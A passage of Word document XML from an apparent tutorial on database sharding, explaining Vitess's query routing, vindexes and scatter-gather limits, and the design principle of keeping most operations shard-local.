        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vitess — MySQL Horizontal Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7025BB8A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Vitess adds a sharding layer on top of MySQL, used by YouTube (serving billions of queries/day):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72988069" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F832FE8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Vitess architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1C98C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  VTGate: stateless query router (horizontally scalable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792DD9C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Receives SQL from application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F085991" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Parses SQL, determines target shard(s) based on vindex (virtual index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E610B62" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Routes to appropriate VTTablet(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFE843E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Merges results if scatter-gather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E242FF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D50F0B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  VTTablet: MySQL proxy (one per MySQL instance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052FA275" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Manages connection pool to MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F780D4B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Applies query rewrites, query policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA29EDC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Reports health, metrics to topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B522A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE69FB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Topology service (etcd/ZooKeeper):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5634A6D0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Stores: shard map, tablet registry, schema, vindex definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0513B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A690BD7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Vindex (sharding key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF814EA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Primary vindex: maps shard key to keyspace ID (128-bit hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A473EBA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Keyspace ID: determines which shard the row belongs to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E7117" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68853B39" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DD891" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Shard key: user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA0ADF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Vindex: hash(user_id) → keyspace_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FB878" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Shard 1: keyspace_id [0x00, 0x80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004BAEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      Shard 2: keyspace_id [0x80, 0xFF]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4083B5B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF2059" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Query: SELECT * FROM users WHERE user_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E8BB44" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      VTGate: keyspace_id = hash(42) → routes to correct shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64FDBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396713ED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      Query: SELECT * FROM users WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427443E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      VTGate: no vindex for email → scatter to all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D3EAD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        (or: use a lookup vindex: secondary mapping email → user_id → keyspace_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A12D7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF1B173" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Lookup vindex (secondary routing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62316B02" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Problem: query by non-shard-key column (email, phone, SSN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE30A97" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Solution: maintain a lookup table (itself sharded) mapping non-key → shard key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D19F4AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CCAF65" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  lookup_by_email table (sharded by email):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02719D06" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    email → user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA18EDF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2FAD9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query by email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E2EA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    1. VTGate → lookup_by_email shard for that email → get user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A06BA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    2. VTGate → users shard for that user_id → get user record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E94DF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    2 round trips but avoids scatter-gather across all user shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B219A2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598E47E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Scatter-gather execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4269198C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  VTGate sends query to all shards in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505E547" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Gathers results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E39B154" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Applies cross-shard sort, limit, aggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6654C9DE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Returns to application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD12822" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFD7C10" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Limitations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D583E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    LIMIT N: each shard returns N rows, VTGate merges (returns correct N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777F019C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ORDER BY + LIMIT N: each shard returns N rows, VTGate merges → returns N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6DBBA0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    OFFSET N: expensive (each shard must return offset+limit, VTGate discards offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3D001" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Aggregates: COUNT, SUM, MIN, MAX pushed down; AVG computed from SUM+COUNT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F78E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    JOINs across shards: very expensive (handled via scatter-gather + in-memory join at VTGate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759DF4C8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="23A5E4C3">
          <v:rect id="_x0000_i5860" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C485B5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Shard-Local vs Cross-Shard Operations — The Design Principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A3DB4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The most important sharding engineering principle: </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>design your data model and access patterns so that the vast majority of operations are shard-local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E1123" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Shard-Local Operation Taxonomy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52543106" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E98DB2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Operations that are shard-local (efficient):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDA953" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Single-entity CRUD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C85AFD2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    GET /users/123      → hash(123) → Shard 3 → SELECT * FROM users WHERE id=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB6CD86" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    POST /orders        → hash(user_id) → Shard 1 → INSERT INTO orders...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F77D66" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    PUT /cart/123/item  → hash(123) → Shard 3 → UPDATE cart SET...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B92854C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F10AD3F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Entity-scoped queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD30E71" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    All orders for user 123 → hash(123) → Shard 3 → SELECT * FROM orders WHERE user_id=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE0CF9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    All addresses for user 123 → same shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A4731D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    User's payment history → same shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E10464" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137236B0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Transactions within one entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8C6EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Place order (debit cart, create order, update inventory_reserved):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3FC11" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      If all on same shard → single-shard ACID transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D49D1B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      If inventory on different shard → cross-shard (problematic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF6CDE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19003F24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Operations that require cross-shard scatter-gather (expensive):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39830E49" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Cross-entity analytics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C7E7EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Total revenue across all users → must query all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57194E08" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Users who ordered product X → all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D36825" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Fraud detection (user pattern across all users) → all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F01BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7702DFF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Administrative/reporting queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4456FB65" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    COUNT(*) across entire table → aggregate from all shards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7247C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    Top 10 users by spend → gather local top 10, merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F9E3C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A640F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Operations not filtered by shard key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3315E233" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    WHERE email = 'alice@example.com' (shard key is user_id, not email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69937C0B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    WHERE created_at &gt; '2024-01-01' (shard key is user_id, not created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A90B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625E3A02" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Design principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E438CA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Identify the top 10 query patterns by frequency × cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756383F5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Design shard key so top 3-5 patterns are shard-local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA4166" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Accept scatter-gather for infrequent analytics (run on read replicas or data warehouse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3B8F0B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Secondary Index Problem</w:t>
      </w:r>
    </w:p>
